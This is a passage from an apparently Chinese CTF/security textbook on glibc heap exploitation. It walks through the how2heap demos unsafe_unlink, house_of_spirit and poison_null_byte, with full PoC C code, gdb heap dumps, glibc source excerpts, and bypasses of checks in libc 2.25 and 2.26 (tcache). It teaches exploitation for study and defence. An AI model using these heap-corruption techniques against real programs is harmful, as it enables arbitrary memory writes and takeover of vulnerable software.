malloc_size 设置为 0x80，可以分配 small chunk，然后定义 header_size 为 2。申请两块空间，全局指针 chunk0_ptr 指向 chunk0，局部指针 chunk1_ptr 指向 chunk1：

gef➤  p &chunk0_ptr
$1 = (uint64_t **) 0x601070 <chunk0_ptr>
gef➤  x/gx &chunk0_ptr
0x601070 <chunk0_ptr>:  0x0000000000602010
gef➤  p &chunk1_ptr
$2 = (uint64_t **) 0x7fffffffdc60
gef➤  x/gx &chunk1_ptr
0x7fffffffdc60: 0x00000000006020a0
gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000091  <-- chunk 1
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000

接下来要绕过 (P->fd->bk != P || P->bk->fd != P) == False 的检查，这个检查有个缺陷，就是 fd/bk 指针都是通过与 chunk 头部的相对地址来查找的。所以我们可以利用全局指针 chunk0_ptr 构造 fake chunk 来绕过它：

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 <-- prev_size
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000
gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540  <-- fake chunk FD
0x601068:   0x0000000000000000  0x0000000000602010      <-- bk pointer
0x601078:   0x0000000000000000
gef➤  x/5gx 0x601060
0x601060:   0x00007ffff7dd2540  0x0000000000000000  <-- fake chunk BK
0x601070:   0x0000000000602010  0x0000000000000000      <-- fd pointer
0x601080:   0x0000000000000000

可以看到，我们在 chunk0 里构造一个 fake chunk，用 P 表示，两个指针 fd 和 bk 可以构成两条链：P->fd->bk == P，P->bk->fd == P，可以绕过检查。另外利用 chunk0 的溢出漏洞，通过修改 chunk 1 的 prev_size 为 fake chunk 的大小，修改 PREV_INUSE 标志位为 0，将 fake chunk 伪造成一个 free chunk。

接下来就是释放掉 chunk1，这会触发 fake chunk 的 unlink 并覆盖 chunk0_ptr 的值。unlink 操作是这样进行的：

FD = P->fd;
BK = P->bk;
FD->bk = BK
BK->fd = FD

根据 fd 和 bk 指针在 malloc_chunk 结构体中的位置，这段代码等价于：

FD = P->fd = &P - 24
BK = P->bk = &P - 16
FD->bk = *(&P - 24 + 24) = P
FD->fd = *(&P - 16 + 16) = P

这样就通过了 unlink 的检查，最终效果为：

FD->bk = P = BK = &P - 16
BK->fd = P = FD = &P - 24

原本指向堆上 fake chunk 的指针 P 指向了自身地址减 24 的位置，这就意味着如果程序功能允许堆 P 进行写入，就能改写 P 指针自身的地址，从而造成任意内存写入。若允许堆 P 进行读取，则会造成信息泄漏。

在这个例子中，由于 P->fd->bk 和 P->bk->fd 都指向 P，所以最后的结果为：

chunk0_ptr = P = P->fd

成功地修改了 chunk0_ptr，这时 chunk0_ptr 和 chunk0_ptr[3] 实际上就是同一东西。这里可能会有疑惑为什么这两个东西是一样的，因为 chunk0_ptr 指针在是放在数据段上的，地址在 0x601070，指向 0x601058，而 chunk0_ptr[3] 的意思是从 chunk0_ptr 指向的地方开始数 3 个单位，所以 0x601058+0x08*3=0x601070：

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000020ff1  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 [be freed]
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000
gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540  <-- fake chunk FD
0x601068:   0x0000000000000000  0x0000000000601058      <-- bk pointer
0x601078:   0x0000000000000000
gef➤  x/5gx 0x601060
0x601060:   0x00007ffff7dd2540  0x0000000000000000  <-- fake chunk BK
0x601070:   0x0000000000601058  0x0000000000000000      <-- fd pointer
0x601080:   0x0000000000000000
gef➤  x/gx chunk0_ptr
0x601058:   0x0000000000000000
gef➤  x/gx chunk0_ptr[3]
0x601058:   0x0000000000000000

所以，修改 chunk0_ptr[3] 就等于修改 chunk0_ptr：

gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540
0x601068:   0x0000000000000000  0x00007fffffffdc70  <-- chunk0_ptr[3]
0x601078:   0x0000000000000000
gef➤  x/gx chunk0_ptr
0x7fffffffdc70: 0x4141414141414141

这时 chunk0_ptr 就指向了 victim_string，修改它：

gef➤  x/gx chunk0_ptr
0x7fffffffdc70: 0x4242424242424242

成功达成修改任意地址的成就。

最后看一点新的东西，libc-2.25 在 unlink 的开头增加了对 chunk_size == next->prev->chunk_size 的检查，以对抗单字节溢出的问题。补丁如下：

$ git show 17f487b7afa7cd6c316040f3e6c86dc96b2eec30 malloc/malloc.c
commit 17f487b7afa7cd6c316040f3e6c86dc96b2eec30
Author: DJ Delorie <dj@delorie.com>
Date:   Fri Mar 17 15:31:38 2017 -0400

    Further harden glibc malloc metadata against 1-byte overflows.

    Additional check for chunk_size == next->prev->chunk_size in unlink()

    2017-03-17  Chris Evans  <scarybeasts@gmail.com>

            * malloc/malloc.c (unlink): Add consistency check between size and
            next->prev->size, to further harden against 1-byte overflows.

diff --git a/malloc/malloc.c b/malloc/malloc.c
index e29105c372..994a23248e 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -1376,6 +1376,8 @@ typedef struct malloc_chunk *mbinptr;

 /* Take a chunk off a bin list */
 #define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);  \
     FD = P->fd;                                                                      \
     BK = P->bk;                                                                      \
     if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                    \

具体是这样的：

/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
/* Like chunksize, but do not mask SIZE_BITS.  */
#define chunksize_nomask(p)         ((p)->mchunk_size)
/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
#define prev_size(p) ((p)->mchunk_prev_size)
/* Bits to mask off when extracting size  */
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

回顾一下伪造出来的堆：

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 <-- prev_size
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000

这里有三种办法可以绕过该检查：

什么都不做。
- chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x0
- prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x0) == 0x0
设置
```
chunk0_ptr[1] = 0x8
```
。
- chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x8
- prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x8) == 0x8
设置
```
chunk0_ptr[1] = 0x80
```
。
- chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x80
- prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x80) == 0x80

好的，现在 libc-2.25 版本下我们也能成功利用了。接下来更近一步，libc-2.26 怎么利用，首先当然要先知道它新增了哪些漏洞缓解措施，其中一个神奇的东西叫做 tcache，这是一种线程缓存机制，每个线程默认情况下有 64 个大小递增的 bins，每个 bin 是一个单链表，默认最多包含 7 个 chunk。其中缓存的 chunk 是不会被合并的，所以在释放 chunk 1 的时候，chunk0_ptr 仍然指向正确的堆地址，而不是之前的 chunk0_ptr = P = P->fd。为了解决这个问题，一种可能的办法是给填充进特定大小的 chunk 把 bin 占满，就像下面这样：

    // deal with tcache
    int *a[10];
    int i;
    for (i = 0; i < 7; i++) {
        a[i] = malloc(0x80);
    }
    for (i = 0; i < 7; i++) {
        free(a[i]);
    }
gef➤  p &chunk0_ptr
$2 = (uint64_t **) 0x555555755070 <chunk0_ptr>
gef➤  x/gx 0x555555755070
0x555555755070 <chunk0_ptr>:    0x00007fffffffdd0f
gef➤  x/gx 0x00007fffffffdd0f
0x7fffffffdd0f: 0x4242424242424242

现在 libc-2.26 版本下也成功利用了。tcache 是个很有趣的东西，更详细的内容我们会在专门的章节里去讲。

加上内存检测参数重新编译，可以看到 heap-buffer-overflow：

$ gcc -fsanitize=address -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x602230, pointing to 0x60c00000bf80
The victim chunk we are going to corrupt is at 0x60c00000bec0

Fake chunk fd: 0x602218
Fake chunk bk: 0x602220

=================================================================
==5591==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000beb0 at pc 0x000000400d74 bp 0x7ffd06423730 sp 0x7ffd06423720
WRITE of size 8 at 0x60c00000beb0 thread T0
    #0 0x400d73 in main /home/firmy/how2heap/unsafe_unlink.c:26
    #1 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #2 0x400968 in _start (/home/firmy/how2heap/a.out+0x400968)

0x60c00000beb0 is located 16 bytes to the left of 128-byte region [0x60c00000bec0,0x60c00000bf40)
allocated by thread T0 here:
    #0 0x7fc9261c4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400b12 in main /home/firmy/how2heap/unsafe_unlink.c:13
    #2 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

house_of_spirit

#include <stdio.h>
#include <stdlib.h>

int main() {
    malloc(1);

    fprintf(stderr, "We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.\n");
    unsigned long long *a, *b;
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    fprintf(stderr, "The first one:  %p\n", &fake_chunks[0]);
    fprintf(stderr, "The second one: %p\n", &fake_chunks[4]);

    fake_chunks[1] = 0x20;      // the size
    fake_chunks[5] = 0x1234;    // nextsize

    fake_chunks[2] = 0x4141414141414141LL;
    fake_chunks[6] = 0x4141414141414141LL;

    fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[0]);
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[0], &fake_chunks[2]);
    b = malloc(0x10);
    fprintf(stderr, "malloc(0x10): %p\n", b);
    b[0] = 0x4242424242424242LL;
}
$ gcc -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one:  0x7ffc782dae00
The second one: 0x7ffc782dae20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7ffc782dae00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffc782dae00, which will be 0x7ffc782dae10!
malloc(0x10): 0x7ffc782dae10

house-of-spirit 是一种 fastbins 攻击方法，通过构造 fake chunk，然后将其 free 掉，就可以在下一次 malloc 时返回 fake chunk 的地址，即任意我们可控的区域。house-of-spirit 是一种通过堆的 fast bin 机制来辅助栈溢出的方法，一般的栈溢出漏洞的利用都希望能够覆盖函数的返回地址以控制 EIP 来劫持控制流，但如果栈溢出的长度无法覆盖返回地址，同时却可以覆盖栈上的一个即将被 free 的堆指针，此时可以将这个指针改写为栈上的地址并在相应位置构造一个 fast bin 块的元数据，接着在 free 操作时，这个栈上的堆块被放到 fast bin 中，下一次 malloc 对应的大小时，由于 fast bin 的先进后出机制，这个栈上的堆块被返回给用户，再次写入时就可能造成返回地址的改写。所以利用的第一步不是去控制一个 chunk，而是控制传给 free 函数的指针，将其指向一个 fake chunk。所以 fake chunk 的伪造是关键。

首先 malloc(1) 用于初始化内存环境，然后在 fake chunk 区域伪造出两个 chunk。另外正如上面所说的，需要一个传递给 free 函数的可以被修改的指针，无论是通过栈溢出还是其它什么方式：

gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- fake chunk 1
0x7fffffffdcc0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
gef➤  x/gx &a
0x7fffffffdca0: 0x0000000000000000

伪造 chunk 时需要绕过一些检查，首先是标志位，PREV_INUSE 位并不影响 free 的过程，但 IS_MMAPPED 位和 NON_MAIN_ARENA 位都要为零。其次，在 64 位系统中 fast chunk 的大小要在 32~128 字节之间。最后，是 next chunk 的大小，必须大于 2*SIZE_SZ（即大于16），小于 av->system_mem（即小于128kb），才能绕过对 next chunk 大小的检查。

libc-2.23 中这些检查代码如下：

void
__libc_free (void *mem)
{
  mstate ar_ptr;
  mchunkptr p;                          /* chunk corresponding to mem */

  [...]
  p = mem2chunk (mem);

  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
    {
      [...]
      munmap_chunk (p);
      return;
    }

  ar_ptr = arena_for_chunk (p);     // 获得 chunk 所属 arena 的地址
  _int_free (ar_ptr, p, 0);         // 当 IS_MMAPPED 为零时调用
}

mem 就是我们所控制的传递给 free 函数的地址。其中下面两个函数用于在 chunk 指针和 malloc 指针之间做转换：

/* conversion from malloc headers to user pointers, and back */

#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))

当 NON_MAIN_ARENA 为零时返回 main arena：

/* find the heap and corresponding arena for a given ptr */

#define heap_for_ptr(ptr) \
  ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
  (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)

这样，程序就顺利地进入了 _int_free 函数：

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */

  [...]
  size = chunksize (p);

  [...]
  /*
    If eligible, place chunk on a fastbin so it can be found
    and used quickly in malloc.
  */

  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

#if TRIM_FASTBINS
      /*
    If TRIM_FASTBINS set, don't place chunks
    bordering top into fastbins
      */
      && (chunk_at_offset(p, size) != av->top)
#endif
      ) {

    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (chunksize (chunk_at_offset (p, size))
                 >= av->system_mem, 0))
      {
        [...]
        errstr = "free(): invalid next size (fast)";
        goto errout;
      }

    [...]
    set_fastchunks(av);
    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);

    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    [...]
    do
      {
    [...]
    p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

其中下面的宏函数用于获得 next chunk：

/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))

然后修改指针 a 指向 (fake chunk 1 + 0x10) 的位置，即上面提到的 mem。然后将其传递给 free 函数，这时程序就会误以为这是一块真的 chunk，然后将其释放并加入到 fastbin 中。

gef➤  x/gx &a
0x7fffffffdca0: 0x00007fffffffdcc0
gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- fake chunk 1 [be freed]
0x7fffffffdcc0: 0x0000000000000000  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820  0x00000000004005b0
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x7fffffffdcc0, size=0x20, flags=)

这时如果我们 malloc 一个对应大小的 fast chunk，程序将从 fastbins 中分配出这块被释放的 chunk。

gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- new chunk
0x7fffffffdcc0: 0x4242424242424242  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820  0x00000000004005b0
gef➤  x/gx &b
0x7fffffffdca8: 0x00007fffffffdcc0

所以 house-of-spirit 的主要目的是，当我们伪造的 fake chunk 内部存在不可控区域时，运用这一技术可以将这片区域变成可控的。上面为了方便观察，在 fake chunk 里填充一些字母，但在现实中这些位置很可能是不可控的，而 house-of-spirit 也正是以此为目的而出现的。

该技术的缺点也是需要对栈地址进行泄漏，否则无法正确覆盖需要释放的堆指针，且在构造数据时，需要满足对齐的要求等。

加上内存检测参数重新编译，可以看到问题所在，即尝试 free 一块不是由 malloc 分配的 chunk：

$ gcc -fsanitize=address -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one:  0x7fffa61d6c00
The second one: 0x7fffa61d6c20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7fffa61d6c00.
Freeing the overwritten pointer.
=================================================================
==5282==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x7fffa61d6c10 in thread T0
    #0 0x7fc4c3a332ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400cab in main /home/firmyy/how2heap/house_of_spirit.c:24
    #2 0x7fc4c35f182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #3 0x4009b8 in _start (/home/firmyy/how2heap/a.out+0x4009b8)

house-of-spirit 在 libc-2.26 下的利用可以查看章节 4.14。

3.1.7 Linux 堆利用（中）

how2heap

下载文件

how2heap

poison_null_byte

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main() {
    uint8_t *a, *b, *c, *b1, *b2, *d;

    a = (uint8_t*) malloc(0x10);
    int real_a_size = malloc_usable_size(a);
    fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n", a);
    fprintf(stderr, "'real' size of 'a': %#x\n", real_a_size);

    b = (uint8_t*) malloc(0x100);
    c = (uint8_t*) malloc(0x80);
    fprintf(stderr, "b: %p\n", b);
    fprintf(stderr, "c: %p\n", c);

    uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
    *(size_t*)(b+0xf0) = 0x100;
    fprintf(stderr, "b.size: %#lx ((0x100 + 0x10) | prev_in_use)\n\n", *b_size_ptr);

    // deal with tcache
    // int *k[10], i;
    // for (i = 0; i < 7; i++) {
    //     k[i] = malloc(0x100);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(k[i]);
    // }
    free(b);
    uint64_t* c_prev_size_ptr = ((uint64_t*)c) - 2;
    fprintf(stderr, "After free(b), c.prev_size: %#lx\n", *c_prev_size_ptr);

    a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
    fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
    fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);

    fprintf(stderr, "Pass the check: chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n", *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
    b1 = malloc(0x80);
    memset(b1, 'A', 0x80);
    fprintf(stderr, "We malloc 'b1': %p\n", b1);
    fprintf(stderr, "c.prev_size: %#lx\n", *c_prev_size_ptr);
    fprintf(stderr, "fake c.prev_size: %#lx\n\n", *(((uint64_t*)c)-4));

    b2 = malloc(0x40);
    memset(b2, 'A', 0x40);
    fprintf(stderr, "We malloc 'b2', our 'victim' chunk: %p\n", b2);

    // deal with tcache
    // for (i = 0; i < 7; i++) {
    //     k[i] = malloc(0x80);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(k[i]);
    // }
    free(b1);
    free(c);
    fprintf(stderr, "Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");

    d = malloc(0x110);
    fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2': %p\n\n", d);

    fprintf(stderr, "b2 content:%s\n", b2);
    memset(d, 'B', 0xb0);
    fprintf(stderr, "New b2 content:%s\n", b2);
}
$ gcc -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xabb010
'real' size of 'a': 0x18
b: 0xabb030
c: 0xabb140
b.size: 0x111 ((0x100 + 0x10) | prev_in_use)

After free(b), c.prev_size: 0x110
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100

Pass the check: chunksize(P) == 0x100 == 0x100 == prev_size (next_chunk(P))
We malloc 'b1': 0xabb030
c.prev_size: 0x110
fake c.prev_size: 0x70

We malloc 'b2', our 'victim' chunk: 0xabb0c0
Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').
Finally, we allocate 'd', overlapping 'b2': 0xabb030

b2 content:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
New b2 content:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

该技术适用的场景需要某个 malloc 的内存区域存在一个单字节溢出漏洞。通过溢出下一个 chunk 的 size 字段，攻击者能够在堆中创造出重叠的内存块，从而达到改写其他数据的目的。再结合其他的利用方式，同样能够获得程序的控制权。

对于单字节溢出的利用有下面几种：

扩展被释放块：当溢出块的下一块为被释放块且处于 unsorted bin 中，则通过溢出一个字节来将其大小扩大，下次取得次块时就意味着其后的块将被覆盖而造成进一步的溢出

  0x100   0x100    0x80
|-------|-------|-------|
|   A   |   B   |   C   |   初始状态
|-------|-------|-------|
|   A   |   B   |   C   |   释放 B
|-------|-------|-------|
|   A   |   B   |   C   |   溢出 B 的 size 为 0x180
|-------|-------|-------|
|   A   |   B   |   C   |   malloc(0x180-8)
|-------|-------|-------|   C 块被覆盖
        |<--实际得到的块->|

扩展已分配块：当溢出块的下一块为使用中的块，则需要合理控制溢出的字节，使其被释放时的合并操作能够顺利进行，例如直接加上下一块的大小使其完全被覆盖。下一次分配对应大小时，即可取得已经被扩大的块，并造成进一步溢出

  0x100   0x100    0x80
|-------|-------|-------|
|   A   |   B   |   C   |   初始状态
|-------|-------|-------|
|   A   |   B   |   C   |   溢出 B 的 size 为 0x180
|-------|-------|-------|
|   A   |   B   |   C   |   释放 B
|-------|-------|-------|
|   A   |   B   |   C   |   malloc(0x180-8)
|-------|-------|-------|   C 块被覆盖
        |<--实际得到的块->|

收缩被释放块：此情况针对溢出的字节只能为 0 的时候，也就是本节所说的 poison-null-byte，此时将下一个被释放的块大小缩小，如此一来在之后分裂此块时将无法正确更新后一块的 prev_size 字段，导致释放时出现重叠的堆块

  0x100     0x210     0x80
|-------|---------------|-------|
|   A   |       B       |   C   |   初始状态
|-------|---------------|-------|
|   A   |       B       |   C   |   释放 B
|-------|---------------|-------|
|   A   |       B       |   C   |   溢出 B 的 size 为 0x200
|-------|---------------|-------|   之后的 malloc 操作没有更新 C 的 prev_size
         0x100  0x80
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   malloc(0x180-8), malloc(0x80-8)
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   释放 B1
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   释放 C，C 将与 B1 合并
|-------|------|-----|--|-------|  
|   A   |  B1  | B2  |  |   C   |   malloc(0x180-8)
|-------|------|-----|--|-------|   B2 将被覆盖
        |<实际得到的块>|

house of einherjar：也是溢出字节只能为 0 的情况，当它是更新溢出块下一块的 prev_size 字段，使其在被释放时能够找到之前一个合法的被释放块并与其合并，造成堆块重叠

  0x100   0x100   0x101
|-------|-------|-------|
|   A   |   B   |   C   |   初始状态
|-------|-------|-------|
|   A   |   B   |   C   |   释放 A
|-------|-------|-------|
|   A   |   B   |   C   |   溢出 B，覆盖 C 块的 size 为 0x200，并使其 prev_size 为 0x200
|-------|-------|-------|
|   A   |   B   |   C   |   释放 C
|-------|-------|-------|
|   A   |   B   |   C   |   C 将与 A 合并
|-------|-------|-------|   B 块被重叠
|<-----实际得到的块------>|

首先分配三个 chunk，第一个 chunk 类型无所谓，但后两个不能是 fast chunk，因为 fast chunk 在释放后不会被合并。这里 chunk a 用于制造单字节溢出，去覆盖 chunk b 的第一个字节，chunk c 的作用是帮助伪造 fake chunk。

首先是溢出，那么就需要知道一个堆块实际可用的内存大小（因为空间复用，可能会比分配时要大一点），用于获得该大小的函数 malloc_usable_size 如下：

/*
   ------------------------- malloc_usable_size -------------------------
 */
static size_t
musable (void *mem)
{
  mchunkptr p;
  if (mem != 0)
    {
      p = mem2chunk (mem);

      [...]
      if (chunk_is_mmapped (p))
        return chunksize (p) - 2 * SIZE_SZ;
      else if (inuse (p))
        return chunksize (p) - SIZE_SZ;
    }
  return 0;
}
/* check for mmap()'ed chunk */
#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
/* extract p's inuse bit */
#define inuse(p)                                  \
  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
/* Get size, ignoring use bits */
#define chunksize(p)         ((p)->size & ~(SIZE_BITS))

所以 real_a_size = chunksize(a) - 0x8 == 0x18。另外需要注意的是程序是通过 next chunk 的 PREV_INUSE 标志来判断某 chunk 是否被使用的。

为了在修改 chunk b 的 size 字段后，依然能通过 unlink 的检查，我们需要伪造一个 c.prev_size 字段，字段的大小是很好计算的，即 0x100 == (0x111 & 0xff00)，正好是 NULL 字节溢出后的值。然后把 chunk b 释放掉，chunk b 随后被放到 unsorted bin 中，大小是 0x110。此时的堆布局如下：

gef➤  x/42gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x0000000000000000    0x0000000000000000
0x603020:    0x0000000000000000    0x0000000000000111  <-- chunk b [be freed]
0x603030:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
